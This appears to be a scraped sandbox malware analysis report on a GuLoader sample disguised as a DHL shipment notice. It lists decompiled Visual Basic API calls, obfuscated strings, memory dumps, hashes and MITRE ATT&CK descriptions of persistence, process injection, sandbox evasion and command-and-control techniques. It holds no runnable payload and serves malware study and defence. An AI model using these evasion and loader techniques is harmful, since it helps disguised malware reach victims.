__vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDAD
__vbaFreeStr.MSVBVM60(0041EDF3,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDE5
__vbaFreeStr.MSVBVM60(0041EDF3,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDED

Strings

Flskekdet, xrefs: 0041ECFE
Fritgaaende, xrefs: 0041ECD9
SKADESLSHOLDELSERNE, xrefs: 0041ECD4
GILENO, xrefs: 0041ED80

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#539#629#696#698ChkstkList
String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
API String ID: 1195518721-3815085929
Opcode ID: 21f479d4e8549f9512b131d84e4517ec8e55ee5aa513d9b356b125a0af386eab
Instruction ID: 3165435b05d5f84532501bab556701fdef39b2ce11282541f8c55afe617deff8
Opcode Fuzzy Hash: 21f479d4e8549f9512b131d84e4517ec8e55ee5aa513d9b356b125a0af386eab
Instruction Fuzzy Hash: 1B31C972940258ABDB00FBD1DD86FEE77B8BB04704F54442AB501BB1E1DB789A098B58

Uniqueness

Uniqueness Score: -1.00%

Function 00420C47, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420C65
#535.MSVBVM60(?,?,?,?,00401546), ref: 00420CAF
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00401546), ref: 00420CD1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,0000004C), ref: 00420D33
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 00420D85
__vbaFreeObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 00420D9C
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DC2
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DCC
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DD4
#613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DF6
#632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420E1A
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 00420E3F
__vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 00420E5F
__vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420E8B
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420EA7
#527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420EB8
__vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420EC2
__vbaFreeStr.MSVBVM60(00420F26), ref: 00420F18
__vbaFreeStr.MSVBVM60(00420F26), ref: 00420F20

Strings

Cryptodeist, xrefs: 00420EB3

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
String ID: Cryptodeist
API String ID: 3497234973-3010629389
Opcode ID: e6ce50758a15ca2145e017513cc8d7a3dd008a7be3c4547de8487f39b0c79984
Instruction ID: a3d4a76e2b47af061966e80575315aca466b86c3be63d67db3ffe8e40ce73383
Opcode Fuzzy Hash: e6ce50758a15ca2145e017513cc8d7a3dd008a7be3c4547de8487f39b0c79984
Instruction Fuzzy Hash: A57139B1901228EBDB10DF91CE45BDDB7B8AF04314F6086AAE119B71E1DB785B48CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004205F9, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420614
#669.MSVBVM60(?,?,?,?,00401546), ref: 00420626
__vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420630
__vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042063B
__vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042064E
#537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420661
__vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042066B
__vbaNew2.MSVBVM60(0040259C,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420683
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004206C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042070B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042071C
__vbaFreeStr.MSVBVM60(00420749,Skimmia,00000000,?,?,?,?,00401546), ref: 00420743

Strings

Printermanualen, xrefs: 004206DD
Skimmia, xrefs: 00420636

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
String ID: Printermanualen$Skimmia
API String ID: 2004920347-2169568590
Opcode ID: 2a274269b54266e1b28992246bd8cf0d3dca2d2ed5c021b36e10c649589bf6f7
Instruction ID: 1f5f0a3d536043ef6f84feea4e576f2d8cc4428acd2aad8097f42b1f72b7d2c8
Opcode Fuzzy Hash: 2a274269b54266e1b28992246bd8cf0d3dca2d2ed5c021b36e10c649589bf6f7
Instruction Fuzzy Hash: 95310871A50218AFCB00EFA5D986BEDBBF4BF48704F60442AF401B71E1DBB85951CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0BC, Relevance: 22.6, APIs: 15, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F0D8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F102
__vbaVarDup.MSVBVM60 ref: 0041F129
#607.MSVBVM60(?,000000BB,?), ref: 0041F13B
__vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041F144
__vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041F14E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041F15D
#717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041F17E
__vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F187
__vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F191
__vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F199
__vbaFreeStr.MSVBVM60(0041F1DC,?,?,?,?,00401546), ref: 0041F1BB
__vbaAryDestruct.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1C6
__vbaFreeStr.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1CE
__vbaFreeStr.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1D6

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
String ID:
API String ID: 1752509113-0
Opcode ID: fd34a71ea108f04a8a8a388cdd11b4521b4fe85834e561fb94705d0c49acf0fb
Instruction ID: b68adc669c6a93ad871fdc12cec82a4f0000957795de364914c73f38f209ce4d
Opcode Fuzzy Hash: fd34a71ea108f04a8a8a388cdd11b4521b4fe85834e561fb94705d0c49acf0fb
Instruction Fuzzy Hash: 6E31DC72900149ABDB00FBD1C986BDEB7B9AF04708F50843AB501B71E1EB786B09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FEE9, Relevance: 16.5, APIs: 11, Instructions: 47COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FF05
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FF2F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FF3A
#612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FF43
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF4C
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF56
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF5E
#554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF63
__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF7B
__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF83
__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF8B

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyMove$#554#612Chkstk
String ID:
API String ID: 3453574145-0
Opcode ID: 1a4b8d5b6b5250ccad47a608e351ad77b3903580ae7d1bfea7bee8f21abe1dc1
Instruction ID: d2cc51361f4f27c508c3ed615b46d83e740902005361d3b9217bebafc60b9dac
Opcode Fuzzy Hash: 1a4b8d5b6b5250ccad47a608e351ad77b3903580ae7d1bfea7bee8f21abe1dc1
Instruction Fuzzy Hash: 4E11FA31900149ABCB00FFA2C886EDEB774BF05708F50853AB501771E1EB3CAA06CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00421347, Relevance: 13.6, APIs: 9, Instructions: 53COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421363
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0042138D
#698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 0042139B
#520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 004213A8
__vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213B1
__vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213BB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213CA
__vbaFreeStr.MSVBVM60(00421403), ref: 004213F5
__vbaFreeStr.MSVBVM60(00421403), ref: 004213FD

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#520#698ChkstkCopyList
String ID:
API String ID: 415313431-0
Opcode ID: 8f7edf635c664b4903e7fe1205321c19f2f759a03192128100c750ad3c64068d
Instruction ID: acf9ba7a7808b8ee63fb7510f00659877307760c796ccb4f7fcb451105fc7c9b
Opcode Fuzzy Hash: 8f7edf635c664b4903e7fe1205321c19f2f759a03192128100c750ad3c64068d
Instruction Fuzzy Hash: 9F11EF72D00218ABCB00FF91DD86EEEB7BCBF44748F54842AF501A71A1EB789605CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041F821, Relevance: 13.6, APIs: 9, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F83D
#707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F865
__vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F86F
#593.MSVBVM60(0000000A), ref: 0041F88C
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F897
#537.MSVBVM60(0000003B,0000000A), ref: 0041F89E
__vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F8A8
__vbaFreeStr.MSVBVM60(0041F8CF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F8C1
__vbaFreeStr.MSVBVM60(0041F8CF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F8C9

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#537#593#707Chkstk
String ID:
API String ID: 2467297632-0
Opcode ID: 4c3784d49d30fa517d435da006b196bbc390b1e36b6f1799cc3846fb075db024
Instruction ID: 04e9fa2f50b4b9f221986749ddd16bcfecf36a641596b32815d4a5c3b84344d6
Opcode Fuzzy Hash: 4c3784d49d30fa517d435da006b196bbc390b1e36b6f1799cc3846fb075db024
Instruction Fuzzy Hash: 7411FE71940209ABDB01FBA1CC56BDE7BB4AF04748F14843AF501BB1E1DB789645CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1FB, Relevance: 12.0, APIs: 8, Instructions: 48COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F217
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F241
__vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041F254
#536.MSVBVM60(00000005), ref: 0041F267
__vbaStrMove.MSVBVM60(00000005), ref: 0041F271
__vbaFreeVar.MSVBVM60(00000005), ref: 0041F279
__vbaFreeStr.MSVBVM60(0041F2A0,00000005), ref: 0041F292
__vbaFreeStr.MSVBVM60(0041F2A0,00000005), ref: 0041F29A

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536ChkstkCopyMove
String ID:
API String ID: 983360083-0
Opcode ID: 392090959a8b571694f60aab22cf4d63e7c94f7ff6f91e36fb8e713515f0db2a
Instruction ID: 69f99529d19ca589f3af9cb6ca5ca592279d261b525a69df8d7a3d959fa8e6d6
Opcode Fuzzy Hash: 392090959a8b571694f60aab22cf4d63e7c94f7ff6f91e36fb8e713515f0db2a
Instruction Fuzzy Hash: F8113C35800209ABCB00FFA5C846BEE7BB4AF05748F50806AF401771E1DB3D9A458B59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmd.exe PID: 3288 Parent PID: 8428 cmd.exeCOMMON

Executed Functions

Function 00D2010E, Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 248filesleeplibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(user32.dllntdll.dll), ref: 00D20195
CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00D2023C
ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00D2026C
Sleep.KERNELBASE(00002EE0), ref: 00D20290

Strings

2, xrefs: 00D20183
user32.dllntdll.dll, xrefs: 00D20191, 00D20194
.dll, xrefs: 00D2014E
kernel32, xrefs: 00D2014A, 00D2014D
ntdll.dll, xrefs: 00D2018B, 00D2018E
1, xrefs: 00D2017D

Memory Dump Source

Source File: 00000027.00000002.5654416613.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: File$CreateLibraryLoadReadSleep
String ID: .dll$1$2$kernel32$ntdll.dll$user32.dllntdll.dll
API String ID: 1602266143-1375677587
Opcode ID: d273159145775cbf99d807b09e3f9e0c2e71cc428fd30a0d8cec744a2f70898a
Instruction ID: cf46fb1eef6241928192b5f51353fb32029ccbcd13308c01a64db6d8548f2e35
Opcode Fuzzy Hash: d273159145775cbf99d807b09e3f9e0c2e71cc428fd30a0d8cec744a2f70898a
Instruction Fuzzy Hash: FA8104B1D00218AAEB10DFE1DC49FAEBBB8EF58704F144019F615EA182E7749A458B75

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DHL Express shipment notification.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposesand to support other malicious activities, including distraction, hacktivism, and extortion.
Tactics:	Impact
Data Sources:	Netflow/Enclave netflow, Network device logs, Network intrusion detection system, Network protocol analysis, SSL/TLS inspection, Web application firewall logs, Web logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre